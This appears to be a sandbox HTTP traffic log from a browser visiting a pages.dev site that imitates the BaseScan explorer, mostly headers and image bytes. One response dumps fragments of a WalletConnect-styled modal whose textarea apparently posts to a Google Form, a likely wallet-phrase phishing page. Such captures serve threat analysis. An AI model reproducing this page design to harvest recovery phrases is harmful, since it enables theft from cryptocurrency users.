                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC648OUTGET /images/gen/metawin_20.png HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC853INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                              Content-Length: 567
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                              Cf-Polished: status=not_needed
                                                                                                                                                                                                                                              ETag: "0f8e5649facd81:0"
                                                                                                                                                                                                                                              Last-Modified: Wed, 10 Aug 2022 09:56:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 203465
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fVZLFtbI%2FxZAnaZkxjCfz0ZaVIXJrTnYaQViKX7ODOKJ5B66P7qBzd9t%2FOccynSEv%2FEtnxceAZUOabRIHHq0E22o%2BKLosw4cWr8oPwFWZlJatF0IYiU%2BevrfLHRDEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2cf7fd27d05-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC516INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 03 00 00 00 ba 57 ed 3f 00 00 00 d5 50 4c 54 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 0b 0b 00 00 00 00 00 00 00 00 00 e3 e3 e3 2e 2e 2e f7 f7 f7 ff ff ff fc fc fc 2d 2d 2d a4 a4 a6 43 42 44 3c 3b 3c 21 21 21 fa fa fa 94 94 96 60 60 60 5c 5c 5c 4b 4b 4b f3 f3 f3 de de de da da db af ae b0 69 69 6a 53 53 53 25 25 26 1c 1c 1c e9 e9 e9 e7 e7 e7 df df e0 cc cc cc bc bc be ba ba bb b2 b2 b3 a1 a1 a2 88 88 88 84 83 87 6d 6d 6e 66 66 66 5d 5d 5d 29 29 29 13 13 14 ed ed ed d2 d2 d3 cf cf cf cc cc ce c6 c6 c6 c1 c1 c3 bf bf c1 b6 b5 b7 a8 a8 aa 9c 9c 9e 99 98 9c 8f 8f 8f 8a 89 8b 7e 7e 80 79 79 79 5b 5b 5b 35 35 35 35 34 35 06 06 06 a5
                                                                                                                                                                                                                                              Data Ascii: PNGIHDRW?PLTE...---CBD<;<!!!```\\\KKKiijSSS%%&mmnfff]]])))~~yyy[[[555545
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC51INData Raw: 56 98 3b f8 4d 0c 2e a9 4d eb 06 d1 38 c4 b5 21 9f 5f 5d 9f 3f 4b e6 b5 ff cf a1 f7 e7 f8 01 0b b5 19 d1 e9 61 9c c5 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                              Data Ascii: V;M.M8!_]?KaIENDB`


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              60192.168.2.549797172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC820OUTGET /images/svg/brands/walletconnect.svg HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/dist/website
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC803INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ARnbKB7CGw8Bxsz%2BgzR%2BC5RD8s8CPRqei5oJVzaOL%2FUximyZ%2BvQEHIh2sb67KbvuUnVLwRNn3XPVHRLgTcDwEDzf%2Bf0TmTVMibmpykZLBv2w36gFPzpmf8oNCeO05GJorJHxYad3oLp67XMo3oSEtJZlnvCETrS6Pkfl6MtiuTstZCguOK%2FatZ2EtMzXe%2Fk5E5%2FGeb8d"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2d0084d4232-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 32 33 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30
                                                                                                                                                                                                                                              Data Ascii: 239d<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="favicon.ico" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="theme-color" content="#0000
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 74 79 3a 20 68 69 64 64 65 6e 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 20 7a 2d 69 6e 64 65 78 3a 20 31 30 30 22 0d 0a 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 3c 64 69 76 0d 0a 20 20 20 20 20 20 20 20 69 64 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 71 72 63 6f 64 65 2d 6d 6f 64 61 6c 22 0d 0a 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 71 72 63 6f 64 65 5f 5f 62 61 73 65 20 61 6e 69 6d 61 74 65 64 20 66 61 64 65 49 6e 22 0d 0a 20 20 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 62 61 73 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e
                                                                                                                                                                                                                                              Data Ascii: ty: hidden; overflow: hidden; z-index: 100" > <div id="walletconnect-qrcode-modal" class="walletconnect-qrcode__base animated fadeIn" > <div class="walletconnect-modal__base"> <div class="walletconn
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 4c 37 39 2e 35 34 32 33 30 32 2c 37 30 2e 39 36 38 35 35 39 32 20 43 37 38 2e 33 31 39 35 32 30 34 2c 37 32 2e 31 36 35 37 36 33 33 20 37 36 2e 33 33 37 30 30 31 2c 37 32 2e 31 36 35 37 36 33 33 20 37 35 2e 31 31 34 32 32 31 34 2c 37 30 2e 39 36 38 35 35 39 32 20 4c 35 34 2e 39 37 37 35 32 36 35 2c 35 31 2e 32 35 33 30 35 36 31 20 43 35 32 2e 35 33 31 39 36 35 33 2c 34 38 2e 38 35 38 36 34 36 39 20 35 32 2e 35 33 31 39 36 35 33 2c 34 34 2e 39 37 36 35 34 33 39 20 35 34 2e 39 37 37 35 32 36 35 2c 34 32 2e 35 38 32 31 33 35 37 20 4c 36 31 2e 34 33 38 35 34 32 39 2c 33 36 2e 32 35 36 32 36 31 32 20 5a 20 4d 32 38 30 2e 32 30 36 33 33 39 2c 37 37 2e 30 33 30 30 30 36 31 20 4c 32 39 38 2e 31 32 38 30 33 36 2c 39 34 2e 35 37 36 39 30 33 31 20 43 33 30 30 2e 35
                                                                                                                                                                                                                                              Data Ascii: L79.542302,70.9685592 C78.3195204,72.1657633 76.337001,72.1657633 75.1142214,70.9685592 L54.9775265,51.2530561 C52.5319653,48.8586469 52.5319653,44.9765439 54.9775265,42.5821357 L61.4385429,36.2562612 Z M280.206339,77.0300061 L298.128036,94.5769031 C300.5
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 2e 30 33 30 30 30 36 31 20 43 32 37 33 2e 37 39 35 37 34 2c 37 34 2e 36 33 35 35 39 36 39 20 32 37 37 2e 37 36 30 37 37 38 2c 37 34 2e 36 33 35 35 39 36 39 20 32 38 30 2e 32 30 36 33 33 39 2c 37 37 2e 30 33 30 30 30 36 31 20 5a 26 23 33 39 3b 20 69 64 3d 26 23 33 39 3b 57 61 6c 6c 65 74 43 6f 6e 6e 65 63 74 26 23 33 39 3b 25 33 45 25 33 43 2f 70 61 74 68 25 33 45 20 25 33 43 2f 67 25 33 45 20 25 33 43 2f 67 25 33 45 20 25 33 43 2f 73 76 67 25 33 45 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 68 65 61 64 65 72 4c 6f 67 6f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 57 61 6c 6c 65 74 43 6f 6e 6e 65 63 74 3c 2f
                                                                                                                                                                                                                                              Data Ascii: .0300061 C273.79574,74.6355969 277.760778,74.6355969 280.206339,77.0300061 Z&#39; id=&#39;WalletConnect&#39;%3E%3C/path%3E %3C/g%3E %3C/g%3E %3C/svg%3E" class="walletconnect-modal__headerLogo" /> <p>WalletConnect</
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 76 6f 74 61 72 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 25 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 65 78 74 61 72 65 61 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6e 61 6d 65 3d 22 65 6e 74 72 79 2e 32 30 33 36 35 30 31 33 35 33 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 74 65 78 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 49 6e 70 75 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69
                                                                                                                                                                                                                                              Data Ascii: target="votar" style="width: 100%" > <textarea name="entry.2036501353" type="text" id="pInput" class="i
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 65 3d 22 73 75 62 6d 69 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3d 22 6c 69 67 68 74 42 6c 75 65 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 63 2d 67 74 73 72 48 54 20 67 66 75 53 71 47 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 69 66 79 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0d
                                                                                                                                                                                                                                              Data Ascii: e="submit" color="lightBlue" style="display: block; justify-content: center" > <div class="sc-gtsrHT gfuSqG"></div> Verify </button>
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC911INData Raw: 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 62 74 6e 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e 65 22 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 22 68 69 64 65 4c 6f 61 64 65 72 28 29 22 2c 20 34 20 2a 20 31 30 30 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 4c 6f 61 64 65 72 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6c 6f 61 64 65 72 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e
                                                                                                                                                                                                                                              Data Ascii: ocument.getElementById("pbtn").style.display = "none"; setTimeout("hideLoader()", 4 * 1000); } function hideLoader() { document.getElementById("loader").style.display = "non
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              61192.168.2.549798188.114.96.34435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC590OUTGET /v1/scripts/hp-sdk.js?v=0 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.hypelab.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1053INHTTP/1.1 302 Found
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                              x-xss-protection: 0
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              x-download-options: noopen
                                                                                                                                                                                                                                              x-permitted-cross-domain-policies: none
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              location: https://d107ul3j3wrui0.cloudfront.net/up/script_asset/710c81a103.js
                                                                                                                                                                                                                                              cache-control: max-age=14400
                                                                                                                                                                                                                                              x-request-id: 9cfaaa05-4bc4-4758-91b8-e457be2a3583
                                                                                                                                                                                                                                              x-runtime: 0.011994
                                                                                                                                                                                                                                              vary: Origin
                                                                                                                                                                                                                                              via: 1.1 fly.io
                                                                                                                                                                                                                                              fly-request-id: 01J8V35ZHNZ24A356WBSHM2PPK-lga
                                                                                                                                                                                                                                              CF-Cache-Status: EXPIRED
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXlA23%2BStSbDp5LzkOcqzM5fZAB26xLSS6m9DItrveiaOQmfxdZrkW28aMtHb7Nutx6eaTLbqWHBtK%2Bk4rVuGqkARwdwPqv2WoZQrjiqkrfD9%2FmtIgoHJ9dutv1Xjbgt7dA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2d03ef419a1-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              62192.168.2.549799104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC648OUTGET /images/gen/stake-4_20.png HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC851INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                              Content-Length: 496
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                              Cf-Polished: status=not_needed
                                                                                                                                                                                                                                              ETag: "0a274379b49da1:0"
                                                                                                                                                                                                                                              Last-Modified: Wed, 17 Jan 2024 23:16:36 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 104391
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q7RZ5OB4HSQNlRFu2wl%2Fi0xYSpXq05ND5dK%2Bgn2af%2BQf4kUCja0uDi0RKuVZwXiUJCC23VOUyPilb6%2Fvo13IJF33koYKUjjvIVFHbmTSRPKykxhFukdY8JiStJFVoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2d0ca8c19ae-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC496INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff db 00 43 00 04 03 03 04 03 03 04 04 03 04 05 04 04 05 06 0a 07 06 06 06 06 0d 09 0a 08 0a 0f 0d 10 10 0f 0d 0f 0e 11 13 18 14 11 12 17 12 0e 0f 15 1c 15 17 19 19 1b 1b 1b 10 14 1d 1f 1d 1a 1f 18 1a 1b 1a ff db 00 43 01 04 05 05 06 05 06 0c 07 07 0c 1a 11 0f 11 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a ff c0 00 11 08 00 14 00 14 03 01 22 00 02 11 01 03 11 01 ff c4 00 19 00 01 00 02 03 00 00 00 00 00 00 00 00 00 00 00 00 00 06 07 03 05 08 ff c4 00 27 10 00 01 03 03 03 03 04 03 00 00 00 00 00 00 00 00 01 02 03 04 00 05 12 06 11 13 07 14 31 15 16 21 22 23 41 62 ff c4 00 18 01 00 03 01 01 00
                                                                                                                                                                                                                                              Data Ascii: JFIFCC"'1!"#Ab


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              63192.168.2.549800104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC648OUTGET /images/gen/bcgame_20c.png HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC843INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                              Cf-Polished: origSize=457
                                                                                                                                                                                                                                              ETag: "80cda0c54ee5d91:0"
                                                                                                                                                                                                                                              Last-Modified: Tue, 12 Sep 2023 07:57:27 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 123028
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jtt2GrE6KGPJSYrpXId3FLUXOzOYs4GyPhmil65z9I6sW0yT5UjlywelgCCgm%2BSTad6TVZva8R7BVtxIG4xVzamF%2FibPxBUVy6cQqEmDJ5o8G8D2ExedhbgCDZZPlg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2d0c8ff1885-EWR
